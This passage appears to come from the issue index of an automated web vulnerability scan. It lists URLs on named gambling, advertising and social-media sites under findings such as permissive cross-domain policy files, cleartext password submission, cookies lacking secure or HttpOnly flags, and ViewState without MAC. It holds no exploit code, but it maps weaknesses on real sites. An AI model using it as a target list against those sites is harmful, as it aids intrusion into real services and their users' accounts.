3.429. http://www.svenskalotter.com/AboutUs.aspx [RegistrationMode cookie]
3.430. http://www.svenskalotter.com/Affiliates.aspx [BO cookie]
3.431. http://www.svenskalotter.com/Affiliates.aspx [RegistrationMode cookie]
3.432. http://www.svenskalotter.com/Charity.aspx [BO cookie]
3.433. http://www.svenskalotter.com/Charity.aspx [RegistrationMode cookie]
3.434. http://www.svenskalotter.com/ContactUsMail.aspx [BO cookie]
3.435. http://www.svenskalotter.com/ContactUsMail.aspx [RegistrationMode cookie]
3.436. http://www.svenskalotter.com/FairPlay.aspx [BO cookie]
3.437. http://www.svenskalotter.com/FairPlay.aspx [RegistrationMode cookie]
3.438. http://www.svenskalotter.com/Help.aspx [BO cookie]
3.439. http://www.svenskalotter.com/Help.aspx [RegistrationMode cookie]
3.440. http://www.svenskalotter.com/InviteFriend.aspx [BO cookie]
3.441. http://www.svenskalotter.com/InviteFriend.aspx [RegistrationMode cookie]
3.442. http://www.svenskalotter.com/PlayersClub.aspx [BO cookie]
3.443. http://www.svenskalotter.com/PlayersClub.aspx [RegistrationMode cookie]
3.444. http://www.svenskalotter.com/Promotions.aspx [BO cookie]
3.445. http://www.svenskalotter.com/Promotions.aspx [RegistrationMode cookie]
3.446. http://www.svenskalotter.com/Responsible.aspx [BO cookie]
3.447. http://www.svenskalotter.com/Responsible.aspx [RegistrationMode cookie]
3.448. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [BO cookie]
3.449. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]
3.450. http://www.svenskalotter.com/Terms.aspx [BO cookie]
3.451. http://www.svenskalotter.com/Terms.aspx [RegistrationMode cookie]
3.452. http://www.svenskalotter.com/UnderAge.aspx [BO cookie]
3.453. http://www.svenskalotter.com/UnderAge.aspx [RegistrationMode cookie]
3.454. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [BO cookie]
3.455. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/ [RegistrationMode cookie]
3.456. http://www.winnings.com/how-to-win-money [winnings[sessionId] cookie]
3.457. http://www.winnings.com/how-to-win-money [winnings[vid] cookie]
3.458. http://www.winnings.com/instant-games [winnings[sessionId] cookie]
3.459. http://www.winnings.com/instant-games [winnings[sessionId] cookie]
3.460. http://www.winnings.com/instant-games [winnings[vid] cookie]
3.461. http://www.winnings.com/lottery-scratch-cards [winnings[sessionId] cookie]
3.462. http://www.winnings.com/lottery-scratch-cards [winnings[vid] cookie]
3.463. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]
3.464. http://www.winnings.com/scratch-cards [winnings[sessionId] cookie]
3.465. http://www.winnings.com/scratch-cards [winnings[vid] cookie]
3.466. http://www.winnings.com/site-map [winnings[vid] cookie]
3.467. http://www.winnings.com/slots [winnings[sessionId] cookie]
3.468. http://www.winnings.com/slots [winnings[sessionId] cookie]
3.469. http://www.winnings.com/slots [winnings[vid] cookie]
4.1. http://ad-emea.doubleclick.net/crossdomain.xml
4.2. http://ad.doubleclick.net/crossdomain.xml
4.3. http://b.scorecardresearch.com/crossdomain.xml
4.4. http://bingo.bet365.com/crossdomain.xml
4.5. https://bingo.betsson.com/crossdomain.xml
4.6. http://c.betrad.com/crossdomain.xml
4.7. http://casino.bet365.com/crossdomain.xml
4.8. http://d.tradex.openx.com/crossdomain.xml
4.9. http://d.xp1.ru4.com/crossdomain.xml
4.10. http://games.bet365.com/crossdomain.xml
4.11. http://getclicky.com/crossdomain.xml
4.12. http://in.getclicky.com/crossdomain.xml
4.13. https://in.getclicky.com/crossdomain.xml
4.14. http://l.betrad.com/crossdomain.xml
4.15. http://log30.doubleverify.com/crossdomain.xml
4.16. http://m.xp1.ru4.com/crossdomain.xml
4.17. http://neogames-tech.com/crossdomain.xml
4.18. http://pixel.invitemedia.com/crossdomain.xml
4.19. http://pixel.quantserve.com/crossdomain.xml
4.20. http://platform.ak.fbcdn.net/crossdomain.xml
4.21. http://poker.bet365.com/crossdomain.xml
4.22. http://res.mccont.com/crossdomain.xml
4.23. http://s.mcstatic.com/crossdomain.xml
4.24. http://s0.2mdn.net/crossdomain.xml
4.25. http://s1.mcstatic.com/crossdomain.xml
4.26. http://s3.mcstatic.com/crossdomain.xml
4.27. http://s4.mcstatic.com/crossdomain.xml
4.28. http://s6.mcstatic.com/crossdomain.xml
4.29. http://secure-us.imrworldwide.com/crossdomain.xml
4.30. http://spe.atdmt.com/crossdomain.xml
4.31. http://static.getclicky.com/crossdomain.xml
4.32. https://static.getclicky.com/crossdomain.xml
4.33. http://va.px.invitemedia.com/crossdomain.xml
4.34. http://winter.metacafe.com/crossdomain.xml
4.35. https://www.betsson.com/crossdomain.xml
4.36. http://www.huddletogether.com/crossdomain.xml
4.37. http://www.metacafe.com/crossdomain.xml
4.38. http://www.neogames.com/crossdomain.xml
4.39. http://bigmoneyscratch.com/crossdomain.xml
4.40. http://br.bigmoneyscratch.com/crossdomain.xml
4.41. http://br.karamba.com/crossdomain.xml
4.42. http://da.bigmoneyscratch.com/crossdomain.xml
4.43. http://da.crazyscratch.com/crossdomain.xml
4.44. http://da.karamba.com/crossdomain.xml
4.45. http://da.scratch2cash.com/crossdomain.xml
4.46. http://da.scratchcardheaven.com/crossdomain.xml
4.47. http://de.bigmoneyscratch.com/crossdomain.xml
4.48. http://de.crazyscratch.com/crossdomain.xml
4.49. http://de.karamba.com/crossdomain.xml
4.50. http://de.scratch2cash.com/crossdomain.xml
4.51. http://de.scratchcardheaven.com/crossdomain.xml
4.52. http://download.neogames-tech.com/crossdomain.xml
4.53. https://download.neogames-tech.com/crossdomain.xml
4.54. http://el.crazyscratch.com/crossdomain.xml
4.55. http://el.karamba.com/crossdomain.xml
4.56. http://en.bigmoneyscratch.com/crossdomain.xml
4.57. http://en.crazyscratch.com/crossdomain.xml
4.58. http://en.info.winnings.com/crossdomain.xml
4.59. http://en.karamba.com/crossdomain.xml
4.60. http://en.scratch2cash.com/crossdomain.xml
4.61. http://en.scratchcardheaven.com/crossdomain.xml
4.62. http://es.bigmoneyscratch.com/crossdomain.xml
4.63. http://es.crazyscratch.com/crossdomain.xml
4.64. http://es.karamba.com/crossdomain.xml
4.65. http://es.scratch2cash.com/crossdomain.xml
4.66. http://es.scratchcardheaven.com/crossdomain.xml
4.67. http://feeds.bbci.co.uk/crossdomain.xml
4.68. http://fi.bigmoneyscratch.com/crossdomain.xml
4.69. http://fi.crazyscratch.com/crossdomain.xml
4.70. http://fi.karamba.com/crossdomain.xml
4.71. http://fi.scratchcardheaven.com/crossdomain.xml
4.72. http://fr.bigmoneyscratch.com/crossdomain.xml
4.73. http://fr.crazyscratch.com/crossdomain.xml
4.74. http://fr.karamba.com/crossdomain.xml
4.75. http://fr.scratch2cash.com/crossdomain.xml
4.76. http://fr.scratchcardheaven.com/crossdomain.xml
4.77. http://home.okscratchcards.com/crossdomain.xml
4.78. http://hu.crazyscratch.com/crossdomain.xml
4.79. http://it.bigmoneyscratch.com/crossdomain.xml
4.80. http://it.crazyscratch.com/crossdomain.xml
4.81. http://it.karamba.com/crossdomain.xml
4.82. http://it.scratch2cash.com/crossdomain.xml
4.83. http://it.scratchcardheaven.com/crossdomain.xml
4.84. http://itunes.apple.com/crossdomain.xml
4.85. http://karamba.com/crossdomain.xml
4.86. http://mundirasca.com/crossdomain.xml
4.87. http://nettiarpa.com/crossdomain.xml
4.88. http://newsrss.bbc.co.uk/crossdomain.xml
4.89. http://nl.bigmoneyscratch.com/crossdomain.xml
4.90. http://nl.crazyscratch.com/crossdomain.xml
4.91. http://nl.karamba.com/crossdomain.xml
4.92. http://nl.scratch2cash.com/crossdomain.xml
4.93. http://nl.scratchcardheaven.com/crossdomain.xml
4.94. http://no.bigmoneyscratch.com/crossdomain.xml
4.95. http://no.crazyscratch.com/crossdomain.xml
4.96. http://no.karamba.com/crossdomain.xml
4.97. http://no.scratchcardheaven.com/crossdomain.xml
4.98. http://optimized-by.rubiconproject.com/crossdomain.xml
4.99. http://pagead2.googlesyndication.com/crossdomain.xml
4.100. http://primescratchcards.com/crossdomain.xml
4.101. http://pt.bigmoneyscratch.com/crossdomain.xml
4.102. http://pt.crazyscratch.com/crossdomain.xml
4.103. http://pt.karamba.com/crossdomain.xml
4.104. http://pt.scratch2cash.com/crossdomain.xml
4.105. http://pt.scratchcardheaven.com/crossdomain.xml
4.106. http://pubads.g.doubleclick.net/crossdomain.xml
4.107. https://secure.neogames-tech.com/crossdomain.xml
4.108. http://server.iad.liveperson.net/crossdomain.xml
4.109. http://static.ak.fbcdn.net/crossdomain.xml
4.110. http://sv.bigmoneyscratch.com/crossdomain.xml
4.111. http://sv.crazyscratch.com/crossdomain.xml
4.112. http://sv.karamba.com/crossdomain.xml
4.113. http://sv.scratch2cash.com/crossdomain.xml
4.114. http://sv.scratchcardheaven.com/crossdomain.xml
4.115. http://svenskalotter.com/crossdomain.xml
4.116. http://video.google.com/crossdomain.xml
4.117. http://www.adobe.com/crossdomain.xml
4.118. http://www.apple.com/crossdomain.xml
4.119. http://www.bigmoneyscratch.com/crossdomain.xml
4.120. http://www.crazyscratch.com/crossdomain.xml
4.121. http://www.facebook.com/crossdomain.xml
4.122. http://www.hopa.com/crossdomain.xml
4.123. http://www.info.crazyscratch.com/crossdomain.xml
4.124. http://www.info.winnings.com/crossdomain.xml
4.125. http://www.karamba.com/crossdomain.xml
4.126. http://www.maestrocard.com/crossdomain.xml
4.127. http://www.mundirasca.com/crossdomain.xml
4.128. http://www.pclscratch.com/crossdomain.xml
4.129. http://www.primegrattage.com/crossdomain.xml
4.130. http://www.primescratchcards.com/crossdomain.xml
4.131. http://www.scratch2cash.com/crossdomain.xml
4.132. http://www.scratchcardheaven.com/crossdomain.xml
4.133. http://www.svenskalotter.com/crossdomain.xml
4.134. http://www.youtube.com/crossdomain.xml
4.135. http://api.twitter.com/crossdomain.xml
4.136. https://casino.betsson.com/crossdomain.xml
4.137. https://games.betsson.com/crossdomain.xml
4.138. https://livecasino.betsson.com/crossdomain.xml
4.139. http://members.bet365.com/crossdomain.xml
4.140. https://members.bet365.com/crossdomain.xml
4.141. https://poker.betsson.com/crossdomain.xml
4.142. https://scratch.betsson.com/crossdomain.xml
4.143. http://twitter.com/crossdomain.xml
4.144. https://www.norskelodd.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml
5.2. http://ad.doubleclick.net/clientaccesspolicy.xml
5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml
5.4. http://s0.2mdn.net/clientaccesspolicy.xml
5.5. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
5.6. http://spe.atdmt.com/clientaccesspolicy.xml
6. Cleartext submission of password
6.1. http://affiliates.interwetten.com/
6.2. http://bingo.bet365.com/play/en/home/
6.3. http://casino.bet365.com/extra/en/online-games/baccarat
6.4. http://casino.bet365.com/extra/en/online-games/blackjack
6.5. http://casino.bet365.com/extra/en/online-games/live-dealer
6.6. http://casino.bet365.com/extra/en/online-games/roulette
6.7. http://casino.bet365.com/home/en/
6.8. http://games.bet365.com/home/en/
6.9. http://poker.bet365.com/home/en/
6.10. http://www.bet365.com/extra/en/betting/in-play
6.11. http://www.bet365.com/extra/en/betting/live-streaming
6.12. http://www.bet365.com/extra/en/mobile/introduction/
6.13. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed
6.14. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back
6.15. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus
6.16. http://www.crazyrewards.com/
6.17. http://www.facebook.com/
6.18. http://www.heavenaffiliates.com/
6.19. http://www.postcodelottery.com/MyAccount.htm
6.20. http://www.tstglobal.com/
7. SSL cookie without secure flag set
7.1. https://bingo.betsson.com/en/
7.2. https://help.betsson.com/display/4/kb/faq/index.aspx
7.3. https://members.bet365.com/members/chat/
7.4. https://poker.betsson.com/en/
7.5. https://scratch.betsson.com/en/
7.6. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx
7.7. https://www.betsson.com/en/about/
7.8. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp
7.9. https://www.betsson.com/en/customer-service/
7.10. https://www.betsson.com/en/customer-service/forgotten-password/
7.11. https://www.betsson.com/en/customer-service/privacy-statement/
7.12. https://www.betsson.com/en/customer-service/responsible-gaming/
7.13. https://www.betsson.com/en/customer-service/terms/index.asp
7.14. https://www.betsson.com/en/my-account/refer-a-friend/index.asp
7.15. https://www.betsson.com/my-account/refer-a-friend/index.asp
7.16. https://www.betsson.com/web/en/sportsbook/
7.17. https://www.interwetten.com/en/Default.aspx
7.18. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx
7.19. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js
7.20. https://www.betsson.com/start/en/
7.21. https://www.betsson.com/start/is/
7.22. https://www.interwetten.com/
7.23. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
8.1. http://www.facebook.com/extern/login_status.php
8.2. http://www.heavenaffiliates.com/
8.3. http://www.metacafe.com/fplayer/
8.4. http://www.youtube.com/user/CrazyScratchCom
8.5. http://www.youtube.com/user/PostcodeLottery
8.6. http://www.youtube.com/user/primescratchcards1
9.1. https://clicktale.pantherssl.com/
9.2. https://www.aspireaffiliates.com/
9.4. https://help.betsson.com/
9.5. https://bingo.betsson.com/
9.6. https://ble.hs.llnwd.net/
9.7. https://casino.betsson.com/
9.8. https://download.macromedia.com/
9.9. https://download.neogames-tech.com/
9.10. https://games.betsson.com/
9.11. https://in.getclicky.com/
9.12. https://livecasino.betsson.com/
9.13. https://members.bet365.com/
9.14. https://poker.betsson.com/
9.15. https://scratch.betsson.com/
9.16. https://seal.verisign.com/
9.17. https://sealinfo.verisign.com/
9.18. https://secure.neogames-tech.com/
9.19. https://static.getclicky.com/
9.20. https://www.betsson.com/
9.21. https://www.interwetten.com/
9.22. https://www.macromedia.com/
9.23. https://www.neogamespartners.com/
9.24. https://www.norskelodd.com/
9.25. https://www.postcodelottery.com/
10. ASP.NET ViewState without MAC enabled
10.1. http://www.lga.org.mt/lga/content.aspx
10.2. http://www.lga.org.mt/lga/home.aspx
11. Cookie scoped to parent domain
11.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
11.10. http://no.winnings.com/
11.11. http://pt.winnings.com/
11.12. http://sv.winnings.com/
11.13. http://www.metacafe.com/fplayer/
11.14. http://www.opensource.org/licenses/mit-license.php
11.15. http://www.vincite.net/
11.16. http://www.winnings.com/
11.17. http://www.winnings.com/xmlrpc.php
11.18. http://b.scorecardresearch.com/b
11.19. http://bid.openx.net/json
11.20. http://br.bigmoneyscratch.com/Home.aspx
11.21. http://br.karamba.com/Home.aspx
11.22. http://da.bigmoneyscratch.com/Home.aspx
11.23. http://da.karamba.com/Home.aspx
11.24. http://da.scratch2cash.com/Home.aspx
11.25. http://da.scratchcardheaven.com/Home.aspx
11.26. http://de.bigmoneyscratch.com/Home.aspx
11.27. http://de.karamba.com/Home.aspx
11.28. http://de.scratch2cash.com/Home.aspx
11.29. http://de.scratchcardheaven.com/Home.aspx
11.30. http://el.karamba.com/Home.aspx
11.31. http://es.bigmoneyscratch.com/Home.aspx
11.32. http://es.karamba.com/Home.aspx
11.33. http://es.scratch2cash.com/Home.aspx
11.34. http://es.scratchcardheaven.com/Home.aspx
11.35. http://fi.bigmoneyscratch.com/Home.aspx
11.36. http://fi.karamba.com/Home.aspx
11.37. http://fi.scratchcardheaven.com/Home.aspx
11.38. http://fr.bigmoneyscratch.com/Home.aspx
11.39. http://fr.karamba.com/Home.aspx
11.40. http://fr.scratch2cash.com/Home.aspx
11.41. http://fr.scratchcardheaven.com/Home.aspx
11.42. http://home.okscratchcards.com/AboutUs.aspx
11.43. http://home.okscratchcards.com/ContactUsMail.aspx
11.44. http://home.okscratchcards.com/FairPlay.aspx
11.45. http://home.okscratchcards.com/PlayersClub.aspx
11.46. http://home.okscratchcards.com/Promotions.aspx
11.47. http://home.okscratchcards.com/Responsible.aspx
11.48. http://home.okscratchcards.com/SecurityAndPrivacy.aspx
11.49. http://home.okscratchcards.com/Terms.aspx
11.50. http://home.okscratchcards.com/help.aspx
11.51. http://home.okscratchcards.com/visit.aspx
11.52. http://it.bigmoneyscratch.com/Home.aspx
11.53. http://it.karamba.com/Home.aspx
11.54. http://it.scratch2cash.com/Home.aspx
11.55. http://it.scratchcardheaven.com/Home.aspx
11.56. http://m.xp1.ru4.com/ad
11.57. http://nl.bigmoneyscratch.com/Home.aspx
11.58. http://nl.karamba.com/Home.aspx
11.59. http://nl.scratch2cash.com/Home.aspx
11.60. http://nl.scratchcardheaven.com/Home.aspx
11.61. http://no.bigmoneyscratch.com/Home.aspx
11.62. http://no.karamba.com/Home.aspx
11.63. http://no.scratchcardheaven.com/Home.aspx
11.64. http://pixel.invitemedia.com/data_sync
11.65. http://pixel.quantserve.com/pixel
11.66. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif
11.67. http://pt.bigmoneyscratch.com/Home.aspx
11.68. http://pt.karamba.com/Home.aspx
11.69. http://pt.scratch2cash.com/Home.aspx
11.70. http://pt.scratchcardheaven.com/Home.aspx
11.71. http://server.iad.liveperson.net/hc/15712222/
11.72. http://solutions.liveperson.com/ref/lppb.asp
11.73. http://sv.bigmoneyscratch.com/Home.aspx
11.74. http://sv.karamba.com/Home.aspx
11.75. http://sv.scratch2cash.com/Home.aspx
11.76. http://sv.scratchcardheaven.com/Home.aspx
11.77. http://va.px.invitemedia.com/goog_imp
11.78. http://winter.metacafe.com/Openx/www/delivery/lg.php
11.79. http://www.bigmoneyscratch.com/
11.80. http://www.bigmoneyscratch.com/AboutUs.aspx
11.81. http://www.bigmoneyscratch.com/Affiliates.aspx
11.82. http://www.bigmoneyscratch.com/ContactUsChat.aspx
11.83. http://www.bigmoneyscratch.com/ContactUsFax.aspx
11.84. http://www.bigmoneyscratch.com/ContactUsMail.aspx
11.85. http://www.bigmoneyscratch.com/ContactUsTel.aspx
11.86. http://www.bigmoneyscratch.com/FAQ.aspx
11.87. http://www.bigmoneyscratch.com/FairPlay.aspx
11.88. http://www.bigmoneyscratch.com/Help.aspx
11.89. http://www.bigmoneyscratch.com/Home.aspx
11.90. http://www.bigmoneyscratch.com/InviteFriend.aspx
11.91. http://www.bigmoneyscratch.com/Mobile.aspx
11.92. http://www.bigmoneyscratch.com/PlayersClub.aspx
11.93. http://www.bigmoneyscratch.com/Promotions.aspx
11.94. http://www.bigmoneyscratch.com/Responsible.aspx
11.95. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx
11.96. http://www.bigmoneyscratch.com/Terms.aspx
11.97. http://www.bigmoneyscratch.com/UnderAge.aspx
11.98. http://www.facebook.com/
11.99. http://www.facebook.com/PrimeScratchCards
11.100. http://www.facebook.com/WinningsCom
11.101. http://www.facebook.com/crazyscratch
11.102. http://www.facebook.com/pages/BigMoneyScratch/156518521055171
11.103. http://www.facebook.com/pages/PrimeScratchCards/122783514413813
11.104. http://www.facebook.com/peoplespostcodelottery
11.106. http://www.hopa.com/visit.aspx
11.107. http://www.info.crazyscratch.com/AboutUs.aspx
11.108. http://www.info.crazyscratch.com/ContactUsFax.aspx
11.109. http://www.info.crazyscratch.com/ContactUsMail.aspx
11.110. http://www.info.crazyscratch.com/ContactUsTel.aspx
11.111. http://www.info.crazyscratch.com/FairPlay.aspx
11.112. http://www.info.crazyscratch.com/Help.aspx
11.113. http://www.info.crazyscratch.com/InviteFriend.aspx
11.114. http://www.info.crazyscratch.com/PlayersClub.aspx
11.115. http://www.info.crazyscratch.com/Privacy.aspx
11.116. http://www.info.crazyscratch.com/Promotions.aspx
11.117. http://www.info.crazyscratch.com/Responsible.aspx
11.118. http://www.info.crazyscratch.com/Terms.aspx
11.119. http://www.info.crazyscratch.com/UnderAge.aspx
11.120. http://www.info.crazyscratch.com/visit.aspx
11.121. http://www.info.winnings.com/visit.aspx
11.122. http://www.karamba.com/
11.123. http://www.karamba.com/AboutUs.aspx
11.124. http://www.karamba.com/FairPlay.aspx
11.125. http://www.karamba.com/Help.aspx
11.126. http://www.karamba.com/Home.aspx
11.127. http://www.karamba.com/InviteFriend.aspx
11.128. http://www.karamba.com/PlayersClub.aspx
11.129. http://www.karamba.com/Privacy.aspx
11.130. http://www.karamba.com/Promotions.aspx
11.131. http://www.karamba.com/Responsible.aspx
11.132. http://www.karamba.com/Sitemap.aspx
11.133. http://www.karamba.com/Terms.aspx
11.134. http://www.karamba.com/UnderAge.aspx
11.135. http://www.karamba.com/click/Karamba.com/ENG/Home/
11.136. http://www.mundirasca.com/
11.137. http://www.mundirasca.com/AboutUs.aspx
11.138. http://www.mundirasca.com/ContactUsChat.aspx
11.139. http://www.mundirasca.com/ContactUsFax.aspx
11.140. http://www.mundirasca.com/ContactUsMail.aspx
11.141. http://www.mundirasca.com/ContactUsTel.aspx
11.142. http://www.mundirasca.com/FAQ.aspx
11.143. http://www.mundirasca.com/FairPlay.aspx
11.144. http://www.mundirasca.com/Help.aspx
11.145. http://www.mundirasca.com/Home.aspx
11.146. http://www.mundirasca.com/InviteFriend.aspx
11.147. http://www.mundirasca.com/PlayersClub.aspx
11.148. http://www.mundirasca.com/Promotions.aspx
11.149. http://www.mundirasca.com/Responsible.aspx
11.150. http://www.mundirasca.com/SecurityAndPrivacy.aspx
11.151. http://www.mundirasca.com/Terms.aspx
11.152. http://www.mundirasca.com/UnderAge.aspx
11.153. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/
11.154. http://www.pclscratch.com/ContactUsMail.aspx
11.155. http://www.pclscratch.com/FairPlay.aspx
11.156. http://www.pclscratch.com/Promotions.aspx
11.157. http://www.pclscratch.com/Responsible.aspx
11.158. http://www.pclscratch.com/SecurityAndPrivacy.aspx
11.159. http://www.pclscratch.com/Terms.aspx
11.160. http://www.postcodelottery.com/AboutUs.htm
11.161. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm
11.162. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm
11.163. http://www.postcodelottery.com/Charities.htm
11.164. http://www.postcodelottery.com/DrawResults.htm
11.165. http://www.postcodelottery.com/FunGames.htm
11.166. http://www.postcodelottery.com/FunGames/FreeGames.htm
11.167. http://www.postcodelottery.com/FunGames/PaidGames.htm
11.168. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
11.169. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm
11.170. http://www.postcodelottery.com/Games/Scratchcards.htm
11.171. http://www.postcodelottery.com/Home.htm
11.172. http://www.postcodelottery.com/HowItWorks.htm
11.173. http://www.postcodelottery.com/MyAccount.htm
11.174. http://www.postcodelottery.com/RSS.htm
11.175. http://www.postcodelottery.com/Sitemap.htm
11.176. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
11.177. http://www.primegrattage.com/
11.178. http://www.primescratchcards.com/
11.179. http://www.primescratchcards.com/HelpDepositMethods.asp
11.180. http://www.primescratchcards.com/InviteFriend.asp
11.181. http://www.primescratchcards.com/Responsible.asp
11.182. http://www.primescratchcards.com/SecurityAndPrivacy.asp
11.183. http://www.primescratchcards.com/aboutus.asp
11.184. http://www.primescratchcards.com/affiliates.asp
11.185. http://www.primescratchcards.com/contactus.asp
11.186. http://www.primescratchcards.com/fairplay.asp
11.187. http://www.primescratchcards.com/help.asp
11.188. http://www.primescratchcards.com/index.asp
11.189. http://www.primescratchcards.com/media.asp
11.190. http://www.primescratchcards.com/playersclub.asp
11.191. http://www.primescratchcards.com/promotions.asp
11.192. http://www.primescratchcards.com/terms.asp
11.193. http://www.primescratchcards.com/underage.asp
11.194. http://www.primescratchcards.com.br/
11.195. http://www.scratch2cash.com/
11.196. http://www.scratch2cash.com/AboutUs.aspx
11.197. http://www.scratch2cash.com/ContactUsMail.aspx
11.198. http://www.scratch2cash.com/FairPlay.aspx
11.199. http://www.scratch2cash.com/Help.aspx
11.200. http://www.scratch2cash.com/Home.aspx
11.201. http://www.scratch2cash.com/InviteFriend.aspx
11.202. http://www.scratch2cash.com/PlayersClub.aspx
11.203. http://www.scratch2cash.com/Promotions.aspx
11.204. http://www.scratch2cash.com/Responsible.aspx
11.205. http://www.scratch2cash.com/SecurityAndPrivacy.aspx
11.206. http://www.scratch2cash.com/Sitemap.aspx
11.207. http://www.scratch2cash.com/Terms.aspx
11.208. http://www.scratch2cash.com/UnderAge.aspx
11.209. http://www.scratchcardheaven.com/
11.210. http://www.scratchcardheaven.com/AboutUs.aspx
11.211. http://www.scratchcardheaven.com/ContactUsMail.aspx
11.212. http://www.scratchcardheaven.com/FairPlay.aspx
11.213. http://www.scratchcardheaven.com/Help.aspx
11.214. http://www.scratchcardheaven.com/Home.aspx
11.215. http://www.scratchcardheaven.com/InviteFriend.aspx
11.216. http://www.scratchcardheaven.com/PlayersClub.aspx
11.217. http://www.scratchcardheaven.com/Promotions.aspx
11.218. http://www.scratchcardheaven.com/Responsible.aspx
11.219. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx
11.220. http://www.scratchcardheaven.com/Terms.aspx
11.221. http://www.scratchcardheaven.com/UnderAge.aspx
11.222. http://www.svenskalotter.com/
11.223. http://www.svenskalotter.com/AboutUs.aspx
11.224. http://www.svenskalotter.com/Affiliates.aspx
11.225. http://www.svenskalotter.com/Charity.aspx
11.226. http://www.svenskalotter.com/ContactUsMail.aspx
11.227. http://www.svenskalotter.com/FairPlay.aspx
11.228. http://www.svenskalotter.com/Help.aspx
11.229. http://www.svenskalotter.com/Home.aspx
11.230. http://www.svenskalotter.com/InviteFriend.aspx
11.231. http://www.svenskalotter.com/PlayersClub.aspx
11.232. http://www.svenskalotter.com/Promotions.aspx
11.233. http://www.svenskalotter.com/Responsible.aspx
11.234. http://www.svenskalotter.com/SecurityAndPrivacy.aspx
11.235. http://www.svenskalotter.com/Terms.aspx
11.236. http://www.svenskalotter.com/UnderAge.aspx
11.237. http://www.svenskalotter.com/click/Svenskalotter.com/SWE/Home/
11.238. http://www.thawte.com/
11.239. https://www.thawte.com/
11.240. http://www.verisign.co.uk/
11.241. http://www.youtube.com/user/CrazyScratchCom
11.242. http://www.youtube.com/user/PostcodeLottery
11.243. http://www.youtube.com/user/primescratchcards1
11.244. http://www.youtube.com/v/
12. Cookie without HttpOnly flag set
12.1. http://bingo.bet365.com/play/en/home/
12.2. http://blog.primescratchcards.co.uk/
12.4. http://casino.bet365.com/en/
12.5. http://casino.bet365.com/extra/en/online-games/baccarat
12.6. http://casino.bet365.com/extra/en/online-games/blackjack
12.7. http://casino.bet365.com/extra/en/online-games/live-dealer
12.8. http://casino.bet365.com/extra/en/online-games/roulette
12.9. http://casino.bet365.com/home/en/
12.10. http://da.crazyscratch.com/
12.11. http://da.winnings.com/
12.12. http://de.crazyscratch.com/
12.13. http://de.winnings.com/
12.14. http://el.crazyscratch.com/
12.15. http://el.winnings.com/
12.16. http://en.crazyscratch.com/
12.17. http://es.crazyscratch.com/
12.18. http://es.winnings.com/
12.19. http://fi.crazyscratch.com/
12.20. http://fi.winnings.com/
12.21. http://fr.crazyscratch.com/
12.22. http://fr.winnings.com/
12.23. http://games.bet365.com/en/scratchcards/
12.24. http://games.bet365.com/home/en/
12.25. http://getclicky.com/66384109
12.26. https://help.betsson.com/display/4/kb/faq/index.aspx
12.27. http://hu.crazyscratch.com/
12.28. http://it.crazyscratch.com/
12.30. https://members.bet365.com/members/chat/
12.31. http://nl.crazyscratch.com/
12.32. http://nl.winnings.com/
12.33. http://no.crazyscratch.com/
12.34. http://no.winnings.com/
12.35. http://poker.bet365.com/en/
12.36. http://poker.bet365.com/home/en/
12.37. http://primescratchcards.com/images/bg.jpg
12.38. http://pt.crazyscratch.com/
12.39. http://pt.winnings.com/
12.41. http://scratch.co.uk/promotions/argos/
12.42. http://solutions.liveperson.com/ref/lppb.asp
12.43. http://sv.crazyscratch.com/
12.44. http://sv.winnings.com/
12.45. http://trk.primescratchcards.com/
12.46. http://winnings.com/xmlrpc.php
12.48. http://www.bet365.com/bg/
12.49. http://www.bet365.com/cs/
12.50. http://www.bet365.com/da/
12.51. http://www.bet365.com/de/
12.52. http://www.bet365.com/el/
12.53. http://www.bet365.com/en/
12.54. http://www.bet365.com/en/default.asp
12.55. http://www.bet365.com/es/
12.56. http://www.bet365.com/home/iface.asp
12.57. http://www.bet365.com/hu/
12.58. http://www.bet365.com/it/
12.59. http://www.bet365.com/nn/
12.60. http://www.bet365.com/pl/
12.61. http://www.bet365.com/pt/
12.62. http://www.bet365.com/ro/
12.63. http://www.bet365.com/sk/
12.64. http://www.bet365.com/sv/
12.65. http://www.bet365.com/zh-CHS/
12.66. http://www.bet365.com/zh-CHT/
12.67. https://www.betsson.com/en/about/
12.68. https://www.betsson.com/en/about/company-information/payments-and-security/index.asp
12.69. https://www.betsson.com/en/customer-service/
12.70. https://www.betsson.com/en/customer-service/forgotten-password/
12.71. https://www.betsson.com/en/customer-service/privacy-statement/
12.72. https://www.betsson.com/en/customer-service/responsible-gaming/
12.73. https://www.betsson.com/en/customer-service/terms/index.asp
12.74. https://www.betsson.com/en/my-account/refer-a-friend/index.asp
12.75. https://www.betsson.com/my-account/refer-a-friend/index.asp
12.76. http://www.crazyscratch.com/
12.78. http://www.lga.org.mt/lga/content.aspx
12.79. http://www.lga.org.mt/lga/home.aspx
12.80. http://www.metacafe.com/fplayer/
12.81. http://www.national-lottery.co.uk/player/p/help/scratchcard.ftl
12.82. http://www.opensource.org/licenses/mit-license.php
12.83. http://www.paysafecard.com/
12.84. http://www.primegaming.com/
12.85. http://www.primegrattage.com/
12.86. http://www.primescratchcards.com/
